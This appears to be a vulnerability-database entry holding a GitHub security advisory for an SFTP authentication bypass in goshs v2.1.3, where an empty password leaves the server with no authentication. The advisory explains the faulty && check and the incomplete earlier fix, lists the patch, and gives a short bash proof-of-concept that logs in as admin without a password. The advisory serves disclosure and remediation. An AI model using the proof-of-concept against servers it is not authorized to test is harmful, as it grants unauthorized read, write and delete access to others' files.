{"id":"CVE-2026-62325","aliases":["GHSA-rjrw-mjq6-hpmm"],"title":"goshs SFTP authentication bypass via empty password (incomplete fix of CVE-2026-40884)","summary":"goshs SFTP authentication bypass via empty password (incomplete fix of CVE-2026-40884)","severity":"critical","cvss":9.1,"cwe":["CWE-306"],"vendor":"patrickhener","product":"github.com/patrickhener/goshs/v2","ecosystem":"go","affected":["github.com/patrickhener/goshs/v2 = 2.1.3","goshs.de/goshs/v2 = 2.1.3"],"patched":["github.com/patrickhener/goshs/v2 2.1.4","goshs.de/goshs/v2 2.1.4"],"published":"2026-07-28","updated":"2026-07-28","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-rjrw-mjq6-hpmm","references":[{"url":"https://github.com/goshs-labs/goshs/security/advisories/GHSA-rjrw-mjq6-hpmm"},{"url":"https://github.com/goshs-labs/goshs/commit/32f4a0e1790a709f722d0f3b2341f139d003180a"},{"url":"https://github.com/goshs-labs/goshs/releases/tag/v2.1.4"},{"url":"https://github.com/advisories/GHSA-rjrw-mjq6-hpmm"}],"tags":["ghsa","go"],"ingestedAt":"2026-07-28T22:40:03.364Z","epss":0.00344,"epssPercentile":0.27925,"slug":"CVE-2026-62325","body":"## Overview\n\n## Summary\n\nStart goshs v2.1.3 with `-b 'admin:' -sftp`. No `-fkf`. SFTP accepts connections without password. CVE-2026-40884 blocks the empty-username variant (`-b ':pass'`). The empty-password variant bypasses that fix.\n\n## CVE-2026-40884\n\n**CVE-2026-40884** (GHSA-c29w-qq4m-2gcv, Apr 13 2026) reported the empty-username case: `-b ':pass'` with `-sftp`. `sftpserver.go:85` uses `&&`:\n\n```go\nif s.Username != \"\" && s.Password != \"\" {\n    sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool {\n        return subtle.ConstantTimeCompare([]byte(ctx.User()), []byte(s.Username)) == 1 && subtle.ConstantTimeCompare([]byte(password), []byte(s.Password)) == 1\n    }\n}\n```\n\nEmpty username → `Username != \"\"` false → `PasswordHandler` nil. No `-fkf` means `PublicKeyHandler` also nil. gliderlabs/ssh sees all handlers nil and sets `NoClientAuth = true`. Unauthenticated access.\n\nPatrickhener fixed it with a sanity check at `sanity/checks.go:114-118`:\n\n```go\nif opts.FTP && opts.FTPSFTPMode && strings.HasPrefix(opts.BasicAuth, \":\") {\n    logger.Fatal(\"When using SFTP with password authentication, the username cannot be empty. ...\")\n}\n```\n\n`HasPrefix(\":\")` catches empty username. It does not catch empty password.\n\n## Empty Password Bypass\n\nSame `&&` at `sftpserver.go:85`. Same nil handler. Different input:\n\n```\ngoshs -b 'admin:' -sftp\n```\n\n- `Username = \"admin\"`, `Password = \"\"`\n- `Username != \"\" && Password != \"\"` → false. Password is empty.\n- `PasswordHandler` not set. No `-fkf` → `PublicKeyHandler` not set.\n- gliderlabs/ssh → `NoClientAuth = true`.\n\nCVE-2026-40884 patched the symptom (empty username) with input validation. Root cause (`&&`) stayed in the code. v2.1.3 still has it. That makes any unanticipated input format exploitable.\n\n## PoC\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nHOST=\"${1:-127.0.0.1}\"\nPORT=\"${2:-2121}\"\n\necho \"[*] Connecting to goshs SFTP at $HOST:$PORT with empty password...\"\necho \"ls -la /\" | sftp -o StrictHostKeyChecking=no \\\n  -o UserKnownHostsFile=/dev/null \\\n  -o PreferredAuthentications=none,password \\\n  -o PubkeyAuthentication=no \\\n  -P \"$PORT\" -b - admin@\"$HOST\" 2>&1 && \\\n  echo \"[+] VULNERABLE: Connected without password!\" || \\\n  echo \"[-] Connection failed (patched or not running)\"\n```\n\n## Root Cause\n\n```go\n// Wrong: &&\nif s.Username != \"\" && s.Password != \"\" {\n\n// Correct: ||\nif s.Username != \"\" || s.Password != \"\" {\n```\n\n`&&` blocks `PasswordHandler` when either field is empty. `||` installs it when either field is set.\n\n## Incomplete Fix\n\nPatrickhener added `HasPrefix(\":\")` at `sanity/checks.go:116`. Two gaps remain:\n\n1. `&&` still at `sftpserver.go:85` in v2.1.3\n2. No `HasSuffix(\":\")` check for empty password\n\n## Impact\n\n- Unauthenticated SFTP file access (read, write, delete, rename)\n- Same impact as CVE-2026-40884 via a different input\n- Exploitable with `-b 'user:'` and no `-fkf`\n\n## Affected\n\nAll goshs versions including v2.1.3. CVE-2026-40884 fix does not cover this variant.\n\n## Recommended Fix\n\n1. `&&` → `||` at `sftpserver/sftpserver.go:85`\n2. `HasSuffix(\":\")` check at `sanity/checks.go`\n3. Shared auth handler setup for HTTP and SFTP code paths\n\n## Affected packages\n\n- `github.com/patrickhener/goshs/v2 = 2.1.3`\n- `goshs.de/goshs/v2 = 2.1.3`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/patrickhener/goshs/v2 2.1.4`\n- `goshs.de/goshs/v2 2.1.4`","depth":"midnight","depthScore":50,"depthScoreParts":{"impact":50.1,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}